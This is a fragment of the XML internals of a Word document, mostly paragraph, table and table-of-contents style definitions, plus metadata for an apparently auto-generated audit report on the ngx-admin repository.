      <w:rFonts w:ascii="Georgia" w:cs="Georgia" w:eastAsia="Georgia" w:hAnsi="Georgia"/>
      <w:color w:val="1C1917"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:styleId="Hyperlink" w:type="character">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rPr>
      <w:color w:val="0563C1"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:styleId="FootnoteReference" w:type="character">
    <w:name w:val="footnote reference"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rPr>
      <w:vertAlign w:val="superscript"/>
    </w:rPr>
  </w:style>
  <w:style w:styleId="FootnoteText" w:type="paragraph">
    <w:name w:val="footnote text"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FootnoteTextChar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:styleId="FootnoteTextChar" w:type="character">
    <w:name w:val="Footnote Text Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="FootnoteText"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rPr>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:styleId="EndnoteReference" w:type="character">
    <w:name w:val="endnote reference"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rPr>
      <w:vertAlign w:val="superscript"/>
    </w:rPr>
  </w:style>
  <w:style w:styleId="EndnoteText" w:type="paragraph">
    <w:name w:val="endnote text"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="EndnoteTextChar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:styleId="EndnoteTextChar" w:type="character">
    <w:name w:val="Endnote Text Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="EndnoteText"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rPr>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:styleId="Subtitle" w:type="paragraph">
    <w:name w:val="Subtitle"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:after="480" w:line="288"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
      <w:b w:val="false"/>
      <w:bCs w:val="false"/>
      <w:i w:val="false"/>
      <w:iCs w:val="false"/>
      <w:color w:val="8B1A2B"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:styleId="Author" w:type="paragraph">
    <w:name w:val="Author"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:pPr>
      <w:spacing w:after="80"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
      <w:caps/>
      <w:color w:val="57534E"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:styleId="Date" w:type="paragraph">
    <w:name w:val="Date"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:pPr>
      <w:spacing w:after="0" w:before="240"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
      <w:caps/>
      <w:color w:val="57534E"/>
      <w:spacing w:val="30"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:styleId="FirstParagraph" w:type="paragraph">
    <w:name w:val="First Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:pPr>
      <w:spacing w:after="160"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Georgia" w:cs="Georgia" w:eastAsia="Georgia" w:hAnsi="Georgia"/>
      <w:color w:val="1C1917"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:styleId="Compact" w:type="paragraph">
    <w:name w:val="Compact"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:pPr>
      <w:spacing w:after="60"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Georgia" w:cs="Georgia" w:eastAsia="Georgia" w:hAnsi="Georgia"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:styleId="BlockText" w:type="paragraph">
    <w:name w:val="Block Text"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:pPr>
      <w:pBdr>
        <w:left w:color="B8860B" w:space="8" w:sz="18" w:val="single"/>
      </w:pBdr>
      <w:spacing w:after="160" w:line="312"/>
      <w:ind w:left="360"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Georgia" w:cs="Georgia" w:eastAsia="Georgia" w:hAnsi="Georgia"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="57534E"/>
      <w:sz w:val="21"/>
      <w:szCs w:val="21"/>
    </w:rPr>
  </w:style>
  <w:style w:styleId="SourceCode" w:type="paragraph">
    <w:name w:val="Source Code"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:pPr>
      <w:pBdr>
        <w:top w:color="E7E5E4" w:space="4" w:sz="4" w:val="single"/>
        <w:bottom w:color="E7E5E4" w:space="4" w:sz="4" w:val="single"/>
        <w:left w:color="8B1A2B" w:space="4" w:sz="18" w:val="single"/>
        <w:right w:color="E7E5E4" w:space="4" w:sz="4" w:val="single"/>
      </w:pBdr>
      <w:shd w:color="auto" w:fill="F8F5EF" w:val="clear"/>
      <w:spacing w:after="100" w:before="100" w:line="312"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
      <w:color w:val="1C1917"/>
      <w:sz w:val="19"/>
      <w:szCs w:val="19"/>
    </w:rPr>
  </w:style>
  <w:style w:styleId="VerbatimChar" w:type="paragraph">
    <w:name w:val="Verbatim Char"/>
    <w:basedOn w:val="Normal"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
      <w:color w:val="73131F"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:styleId="TOCHeading" w:type="paragraph">
    <w:name w:val="TOC Heading"/>
    <w:basedOn w:val="Heading1"/>
    <w:next w:val="Normal"/>
    <w:qFormat/>
    <w:pPr>
      <w:pBdr>
        <w:bottom w:color="8B1A2B" w:space="6" w:sz="18" w:val="single"/>
      </w:pBdr>
      <w:spacing w:after="240" w:before="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="8B1A2B"/>
      <w:sz w:val="44"/>
      <w:szCs w:val="44"/>
    </w:rPr>
  </w:style>
  <w:style w:styleId="TOC1" w:type="paragraph">
    <w:name w:val="toc 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:pPr>
      <w:spacing w:after="40" w:before="120"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="1C1917"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:styleId="TOC2" w:type="paragraph">
    <w:name w:val="toc 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:pPr>
      <w:spacing w:after="40"/>
      <w:ind w:left="240"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
      <w:color w:val="57534E"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:styleId="TOC3" w:type="paragraph">
    <w:name w:val="toc 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:pPr>
      <w:spacing w:after="40"/>
      <w:ind w:left="480"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
      <w:color w:val="57534E"/>
      <w:sz w:val="21"/>
      <w:szCs w:val="21"/>
    </w:rPr>
  </w:style>
  <w:style w:styleId="Hyperlink" w:type="paragraph">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="Normal"/>
    <w:rPr>
      <w:color w:val="8B1A2B"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:styleId="Caption" w:type="paragraph">
    <w:name w:val="Caption"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:pPr>
      <w:spacing w:after="120"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="57534E"/>
      <w:sz w:val="19"/>
      <w:szCs w:val="19"/>
    </w:rPr>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styleId="Table" w:type="table">
    <w:name w:val="Table"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="1"/>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:hAnsi="Calibri"/>
      <w:sz w:val="21"/>
    </w:rPr>
    <w:tblPr>
      <w:tblStyleRowBandSize w:val="1"/>
      <w:tblInd w:type="dxa" w:w="0"/>
      <w:tblBorders>
        <w:top w:color="E7E5E4" w:space="0" w:sz="4" w:val="single"/>
        <w:left w:color="E7E5E4" w:space="0" w:sz="4" w:val="single"/>
        <w:bottom w:color="E7E5E4" w:space="0" w:sz="4" w:val="single"/>
        <w:right w:color="E7E5E4" w:space="0" w:sz="4" w:val="single"/>
        <w:insideH w:color="E7E5E4" w:space="0" w:sz="4" w:val="single"/>
        <w:insideV w:color="E7E5E4" w:space="0" w:sz="4" w:val="single"/>
      </w:tblBorders>
      <w:tblCellMar>
        <w:top w:type="dxa" w:w="100"/>
        <w:left w:type="dxa" w:w="160"/>
        <w:bottom w:type="dxa" w:w="100"/>
        <w:right w:type="dxa" w:w="160"/>
      </w:tblCellMar>
    </w:tblPr>
    <w:tblStylePr w:type="firstRow">
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        <w:b/>
        <w:color w:val="FFFFFF"/>
        <w:sz w:val="21"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:tcBorders>
          <w:bottom w:color="73131F" w:space="0" w:sz="4" w:val="single"/>
        </w:tcBorders>
        <w:shd w:color="auto" w:fill="8B1A2B" w:val="clear"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band2Horz">
      <w:tblPr/>
      <w:tcPr>
        <w:shd w:color="auto" w:fill="FDFBF7"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
</file>

<file path=word/_rels/header1.xml.rels><?xml version="1.0" encoding="UTF-8"?><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Audit Report</dc:title>
  <dc:creator>Generated by DocAgent — automated codebase documentation analysis. Based on analysis of 3 screens. Subject matter expert review is recommended before distribution.</dc:creator>
  <cp:keywords/>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-04-20T16:49:39Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-04-20T16:49:39Z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April 19, 2026</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="subtitle">
    <vt:lpwstr>myowjaYOY/ngx-admin</vt:lpwstr>
  </property>
</Properties>
</file>